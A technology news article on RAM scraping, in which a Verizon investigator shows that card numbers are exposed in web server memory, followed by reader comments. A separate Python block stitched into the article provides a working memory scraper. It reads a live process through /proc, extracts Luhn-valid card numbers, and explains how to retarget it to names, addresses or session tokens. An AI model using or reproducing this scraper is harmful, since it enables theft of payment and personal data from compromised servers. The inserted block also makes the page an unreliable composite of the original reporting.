How hackers scrape RAM to circumvent encryption

Summary: Encryption protects data in transit and at rest, but, according to Verizon, most organisations don't realise that the same data is still exposed while it is being processed.


Speaking at the company's media day forum in Singapore yesterday, Verizon Business Investigative Response managing principal Mark Goudie said that today's encryption standards do a good job of protecting data at rest, such as data stored on a server, and data in transit across a network. In many cases, however, the data is left completely exposed during the processing stage.

"It's hard to process encrypted data. If you want to process the data, you need it unencrypted. We all know that, [but] so do the bad guys."

This has opened servers up to a technique that Goudie calls RAM scraping: reading the memory of the running web server process and extracting data while it sits there in its decrypted, in-use form.

"If I can do it, and I'm a bad programmer ... professionals can do it far better than I can."

Goudie believes that the technique has been in use for several years, dating back to 2008, but that many organisations are simply unaware of it and assume that because data is encrypted at rest and in transit, the information is secure.

"This is what I hear all the time: 'We could not have possibly been hacked, because we don't store any sensitive data, we just send it off to somebody else.'"

Goudie demonstrated the attack to journalists using a fictitious e-commerce site that never stores credit card information, a practice many retailers follow: they take the payment details and pass them straight on to a third-party payment processor.

However, the web server still has to handle the card details in order to pass them on, and while it does so they sit in the server's memory in cleartext, which is where Goudie retrieved them.

"I grabbed the processes, I found where the memory locations were, I got the memory locations, and I looked through it."

Goudie said that while the demonstration showed how easy it is to harvest credit card numbers, that is only one use of RAM scraping.

"I'm not just talking about credit card numbers. Credit card numbers are just the most prolific and obvious examples. Any data that you can make a regular expression out of, like a name or an address, all these things are things you can search for [and] anything that you can search for and find can be pulled out."
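As an added illustration, here is a minimal RAM scraper of the kind described above, written in Python. It is not code from the article, from Goudie's demonstration or from Verizon. It walks a process's readable memory regions through Linux /proc/<pid>/maps and /proc/<pid>/mem, regex-searches each region for card-number-shaped digit runs, and keeps only candidates that pass the Luhn check, so that counters, order IDs and timestamps are not reported. The SAMPLE_MEMORY buffer is a constructed stand-in for a heap snapshot of a checkout process and uses published brand test numbers, not real accounts; the function names, chunk size and masking format are this example's own choices.

```python
"""Added example (not from the article or Verizon): regex-and-Luhn scan of
process memory for card numbers, the technique the article calls RAM scraping.
Live scanning uses Linux /proc/<pid>/maps and /proc/<pid>/mem; elsewhere, or
without ptrace rights, run scan_bytes() over a memory dump instead."""
import re
import sys

# 13 to 19 digits, optionally separated by single spaces or dashes,
# bounded on both sides by non-digits so sub-runs of longer numbers are skipped.
PAN_RE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum (ISO/IEC 7812), used by all major card brands."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_bytes(blob: bytes, base: int = 0) -> list[tuple[int, str]]:
    """Return (offset, pan) for every Luhn-valid card-shaped run in blob."""
    found = []
    for m in PAN_RE.finditer(blob):
        digits = re.sub(rb"[ -]", b"", m.group(0)).decode("ascii")
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append((base + m.start(), digits))
    return found


def readable_regions(pid):
    """Yield (start, end, path) for readable mappings in /proc/<pid>/maps."""
    with open(f"/proc/{pid}/maps") as f:
        for line in f:
            fields = line.split(maxsplit=5)
            addr, perms = fields[0], fields[1]
            path = fields[5].strip() if len(fields) > 5 else ""
            if "r" not in perms or path == "[vsyscall]":
                continue
            start, end = (int(x, 16) for x in addr.split("-"))
            yield start, end, path


def scan_process(pid, chunk=16 << 20):
    """Scrape a live process. Needs ptrace rights over pid (root, or the same
    uid with a permissive Yama ptrace_scope); unreadable regions are skipped."""
    hits = []
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        for start, end, _path in readable_regions(pid):
            pos = start
            while pos < end:
                try:
                    mem.seek(pos)
                    data = mem.read(min(chunk, end - pos))
                except (OSError, OverflowError, ValueError):
                    break
                if not data:
                    break
                hits.extend(scan_bytes(data, pos))
                pos += len(data)
    return hits


# Constructed stand-in for a heap snapshot of a checkout process: a form body
# and a JSON fragment holding two brand test numbers, plus digit noise that
# must NOT be reported (a 17-digit order ID and a Luhn-invalid number).
SAMPLE_MEMORY = (
    b"\x00\x00POST /checkout HTTP/1.1\r\n\r\n"
    b"card=4111 1111 1111 1111&cvv=123&exp=12/27\x00\x00"
    b'{"pan":"5555-5555-5555-4444","amt":1999}\x00'
    b"order_id=12345678901234567\x00"
    b"not_a_card=4111111111111112\x00"
)

if __name__ == "__main__":
    # With a PID argument, scrape that process; otherwise scan the sample image.
    hits = scan_process(int(sys.argv[1])) if len(sys.argv) > 1 else scan_bytes(SAMPLE_MEMORY)
    for off, pan in hits:
        print(f"0x{off:x}: {pan[:6]}{'*' * (len(pan) - 10)}{pan[-4:]}")
```

Run without arguments to scan the constructed image (it reports the two test numbers and ignores the noise); run with a PID to scan a live process. Two practical points follow from the code. First, the regex is the only part that is card-specific: swapping PAN_RE for a pattern matching names, addresses or session tokens gives the general scraper Goudie describes, with the Luhn check replaced by whatever validation that data type allows. Second, on Linux the scraper can only open /proc/<pid>/mem if the kernel grants ptrace access, which depends on running as root, or as the web server's own user under a Yama ptrace_scope that permits it, and on the target not having cleared its dumpable flag, so "compromise the server" in practice means obtaining that level of access rather than just any foothold.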

Michael Lee travelled to Singapore as a guest of Verizon Enterprise Solutions.

Topics: Security, E-Commerce, Malware, Verizon

Michael Lee

About Michael Lee

A Sydney, Australia-based journalist, Michael Lee covers a gamut of news in the technology space including information security, state Government initiatives, and local startups.

  • RAM computer forensics

    Our team has developed and is offering for free RAM extraction tools working in Windows. Both are free (as in beer and as in speech); we thought sharing back to the community is a good idea.
    Alexander Sverdlov
    • Do you mind if I share this on LinkedIn?

      This is useful info and could help a company in the cybersecurity arms race. Would it be OK to share this? Either way, I wouldn't share your name unless you also OK that as well.

      Please let me know.

      Thank you!

      Darren Singleton, CISSP CISA
  • yes and no

    You have to hijack the web server and that is not unusual, especially for a smaller company that is running just one box or doing all the heavy lifting on just the web server instance.

    Does this work if you are using an external DLL call to handle the encryption? It seems it would if you scanned all the RAM and knew what you were looking for. I was thinking that you could pass the data to another OS partition that didn't share RAM (sandbox/virtual servers), but I don't know if that is possible. The incoming (to the web server) data is still exposed as the web server/page handles the data, though, so I don't guess my idea has merit. What do you guys think?

    Can you encrypt it at the user end before it is sent back to the web server? Is that practical?
    • Solve the problem, not the symptoms

      As I understand it, the technique uses any running process on the machine. The webserver was the obvious choice in this case, but handing it off to another process or server would not circumvent an attack and would simply open up an additional avenue for attack once the data clears the webserver process.

      Client-side encryption opens up another host of problems such as the server having no way of doing even simple checks like that the credit card is in the correct format, and has to rely on the client not being compromised.

      The easiest and proper thing to do is to actually secure the webserver.


      Michael Lee (Mukimu)
  • Not a Huge Revelation

    To recap, a hacker who can compromise a server can also compromise the encryption/decryption mechanisms on that server.

    I'm no security expert, but even I knew that. I wish ZDNet was a little more investigative, and they tried to figure out how widespread this lack of knowledge is.
    • Goudie hears it all the time

      As Goudie mentions, he's hearing from misinformed companies all the time. There's no formal stats from the company of awareness, but I can give you an idea of how widespread the attacks are.

      Verizon touched on RAM scraping in this year's Data Breach Investigation Report. About 2 percent of malware infecting all organisations uses RAM scraping. This number rises to 6 percent if it is a large organisation.

      Hope that helps! =)

      Michael Lee (Mukimu)
  • RAM Scraping

    I am not a programmer, so I don't know a lot about hacking and stealing, but years ago I saw some encryption software for emailing and other uses that would encrypt a document and self-decrypt when opened by the recipient. Will RAM scraping circumvent that too?
    • Yes.

      "RAM scraping" is a very old technique and is just running a process to find RAM areas to access on a processor/OS that has no process security that traps access to areas of RAM that a given process does not own. Since few folks have such security, it'll work on any PC or OS out there.
  • A physical world analogy

    An analogy in the physical world would be if you received sealed transactions, opened them in the same room in which you process them, and then sealed the replies before sending them on, while shredding the worksheets. You would be fine unless someone managed to install a camera in the ceiling over your worktable!

    Basically then, if the hacker can get one of these processes working on your server that can report back to its master, it's just like a camera in the ceiling over a clerk's desk. The way to stop it is to prevent the "camera" from being installed.